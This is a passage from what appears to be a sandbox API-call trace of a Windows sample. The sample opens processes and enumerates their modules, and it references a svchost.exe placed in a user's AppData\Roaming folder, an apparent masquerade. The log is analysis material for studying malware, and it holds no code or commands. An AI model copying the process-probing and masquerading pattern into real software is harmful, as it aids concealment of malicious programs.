EntryPoint=0x13b14a1)) returned 1 [0075.325] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.325] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x13b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="isspos.exe") returned 0xa [0075.326] CoTaskMemFree (pv=0xd910e0) [0075.326] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.326] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x13b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\isspos.exe" (normalized: "c:\\program files\\msbuild\\isspos.exe")) returned 0x23 [0075.326] CoTaskMemFree (pv=0xd910e0) [0075.326] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2590f60, cb=0x18 | out: lpmodinfo=0x2590f60*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0075.327] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.327] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0075.327] CoTaskMemFree (pv=0xd910e0) [0075.327] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.327] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0075.328] CoTaskMemFree (pv=0xd910e0) [0075.328] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2593138, cb=0x18 | out: lpmodinfo=0x2593138*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0075.328] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.328] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0075.329] CoTaskMemFree (pv=0xd910e0) [0075.329] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.329] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0075.329] CoTaskMemFree (pv=0xd910e0) [0075.329] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25952f8, cb=0x18 | out: lpmodinfo=0x25952f8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0075.330] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.330] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0075.330] CoTaskMemFree (pv=0xd910e0) [0075.330] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.330] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0075.331] CoTaskMemFree (pv=0xd910e0) [0075.331] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25974c8, cb=0x18 | out: lpmodinfo=0x25974c8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0075.331] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.331] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0075.332] CoTaskMemFree (pv=0xd910e0) [0075.332] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.332] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0075.333] CoTaskMemFree (pv=0xd910e0) [0075.333] CloseHandle (hObject=0x218) returned 1 [0075.334] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0075.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x344) returned 0x218 [0075.334] EnumProcessModules (in: hProcess=0x218, lphModule=0x2599be8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2599be8, lpcbNeeded=0x23ee40) returned 1 [0075.340] EnumProcessModules (in: hProcess=0x218, lphModule=0x2599e00, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x2599e00, lpcbNeeded=0x23ee40) returned 1 [0075.345] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x259a270, cb=0x18 | out: lpmodinfo=0x259a270*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0075.345] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.345] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0075.346] CoTaskMemFree (pv=0xd910e0) [0075.346] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.346] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0075.346] CoTaskMemFree (pv=0xd910e0) [0075.346] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x259c468, cb=0x18 | out: lpmodinfo=0x259c468*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0075.347] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.347] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0075.347] CoTaskMemFree (pv=0xd910e0) [0075.347] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.347] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0075.348] CoTaskMemFree (pv=0xd910e0) [0075.348] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x259e628, cb=0x18 | out: lpmodinfo=0x259e628*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0075.348] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.348] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0075.349] CoTaskMemFree (pv=0xd910e0) [0075.349] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.349] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0075.349] CoTaskMemFree (pv=0xd910e0) [0075.349] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25a07f8, cb=0x18 | out: lpmodinfo=0x25a07f8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0075.350] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.350] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0075.350] CoTaskMemFree (pv=0xd910e0) [0075.351] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.351] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0075.351] CoTaskMemFree (pv=0xd910e0) [0075.351] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25a29c8, cb=0x18 | out: lpmodinfo=0x25a29c8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0075.352] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.352] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0075.352] CoTaskMemFree (pv=0xd910e0) [0075.352] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.353] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0075.353] CoTaskMemFree (pv=0xd910e0) [0075.353] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x25a4be0, cb=0x18 | out: lpmodinfo=0x25a4be0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0075.354] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.354] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0075.355] CoTaskMemFree (pv=0xd910e0) [0075.355] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.355] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0075.355] CoTaskMemFree (pv=0xd910e0) [0075.355] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25a6da0, cb=0x18 | out: lpmodinfo=0x25a6da0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0075.356] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.356] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0075.357] CoTaskMemFree (pv=0xd910e0) [0075.357] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.357] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0075.358] CoTaskMemFree (pv=0xd910e0) [0075.358] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25a8f60, cb=0x18 | out: lpmodinfo=0x25a8f60*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0075.358] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.358] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0075.359] CoTaskMemFree (pv=0xd910e0) [0075.359] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.359] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0075.360] CoTaskMemFree (pv=0xd910e0) [0075.360] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x25ab138, cb=0x18 | out: lpmodinfo=0x25ab138*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0075.361] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.361] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0075.361] CoTaskMemFree (pv=0xd910e0) [0075.362] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.362] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0075.362] CoTaskMemFree (pv=0xd910e0) [0075.362] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x25ad390, cb=0x18 | out: lpmodinfo=0x25ad390*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0075.363] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.363] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0075.364] CoTaskMemFree (pv=0xd910e0) [0075.364] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.364] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0075.365] CoTaskMemFree (pv=0xd910e0) [0075.365] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x25af550, cb=0x18 | out: lpmodinfo=0x25af550*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0075.366] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.366] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0075.367] CoTaskMemFree (pv=0xd910e0) [0075.367] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.367] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0075.368] CoTaskMemFree (pv=0xd910e0) [0075.368] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25b1700, cb=0x18 | out: lpmodinfo=0x25b1700*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0075.369] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.369] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0075.370] CoTaskMemFree (pv=0xd910e0) [0075.370] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.370] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0075.371] CoTaskMemFree (pv=0xd910e0) [0075.371] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x25b38c0, cb=0x18 | out: lpmodinfo=0x25b38c0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0075.372] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.372] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0075.373] CoTaskMemFree (pv=0xd910e0) [0075.373] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.373] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0075.374] CoTaskMemFree (pv=0xd910e0) [0075.374] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x25b5a80, cb=0x18 | out: lpmodinfo=0x25b5a80*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0075.375] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.375] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0075.376] CoTaskMemFree (pv=0xd910e0) [0075.376] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.376] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0075.377] CoTaskMemFree (pv=0xd910e0) [0075.377] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x25b7c40, cb=0x18 | out: lpmodinfo=0x25b7c40*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0075.378] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.378] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0075.379] CoTaskMemFree (pv=0xd910e0) [0075.380] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.380] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0075.381] CoTaskMemFree (pv=0xd910e0) [0075.381] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x25b9e10, cb=0x18 | out: lpmodinfo=0x25b9e10*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0075.384] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.384] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0075.385] CoTaskMemFree (pv=0xd910e0) [0075.385] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.386] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0075.387] CoTaskMemFree (pv=0xd910e0) [0075.387] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb750000, lpmodinfo=0x25bbfe0, cb=0x18 | out: lpmodinfo=0x25bbfe0*(lpBaseOfDll=0x7fefb750000, SizeOfImage=0xac000, EntryPoint=0x7fefb766acc)) returned 1 [0075.388] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.388] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb750000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="audiosrv.dll") returned 0xc [0075.389] CoTaskMemFree (pv=0xd910e0) [0075.389] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.389] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb750000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")) returned 0x20 [0075.390] CoTaskMemFree (pv=0xd910e0) [0075.390] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb720000, lpmodinfo=0x25be2c8, cb=0x18 | out: lpmodinfo=0x25be2c8*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0075.391] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.392] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0075.393] CoTaskMemFree (pv=0xd910e0) [0075.393] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.393] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0075.394] CoTaskMemFree (pv=0xd910e0) [0075.394] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x25c0498, cb=0x18 | out: lpmodinfo=0x25c0498*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0075.395] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.395] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0075.397] CoTaskMemFree (pv=0xd910e0) [0075.397] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.397] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0075.398] CoTaskMemFree (pv=0xd910e0) [0075.398] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x25c2668, cb=0x18 | out: lpmodinfo=0x25c2668*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0075.399] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.399] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0075.401] CoTaskMemFree (pv=0xd910e0) [0075.401] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.401] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0075.402] CoTaskMemFree (pv=0xd910e0) [0075.402] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x25c4838, cb=0x18 | out: lpmodinfo=0x25c4838*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0075.404] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.404] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0075.405] CoTaskMemFree (pv=0xd910e0) [0075.405] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.405] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0075.407] CoTaskMemFree (pv=0xd910e0) [0075.407] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x25c6a08, cb=0x18 | out: lpmodinfo=0x25c6a08*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0075.408] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.408] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0075.410] CoTaskMemFree (pv=0xd910e0) [0075.410] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.410] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0075.411] CoTaskMemFree (pv=0xd910e0) [0075.411] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbcc0000, lpmodinfo=0x25c8bc8, cb=0x18 | out: lpmodinfo=0x25c8bc8*(lpBaseOfDll=0x7fefbcc0000, SizeOfImage=0x4b000, EntryPoint=0x7fefbccefcc)) returned 1 [0075.413] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.413] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbcc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MMDevAPI.DLL") returned 0xc [0075.415] CoTaskMemFree (pv=0xd910e0) [0075.415] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.415] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbcc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\MMDevAPI.DLL" (normalized: "c:\\windows\\system32\\mmdevapi.dll")) returned 0x20 [0075.417] CoTaskMemFree (pv=0xd910e0) [0075.417] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc130000, lpmodinfo=0x25cad98, cb=0x18 | out: lpmodinfo=0x25cad98*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0075.418] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.418] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc130000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0075.420] CoTaskMemFree (pv=0xd910e0) [0075.420] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.420] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc130000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0075.421] CoTaskMemFree (pv=0xd910e0) [0075.422] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb710000, lpmodinfo=0x25ccf58, cb=0x18 | out: lpmodinfo=0x25ccf58*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0075.423] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.423] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0075.425] CoTaskMemFree (pv=0xd910e0) [0075.425] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.425] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0075.426] CoTaskMemFree (pv=0xd910e0) [0075.427] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x25cf130, cb=0x18 | out: lpmodinfo=0x25cf130*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0075.428] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.428] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0075.432] CoTaskMemFree (pv=0xd910e0) [0075.432] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.432] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0075.434] CoTaskMemFree (pv=0xd910e0) [0075.434] GetModuleInformation 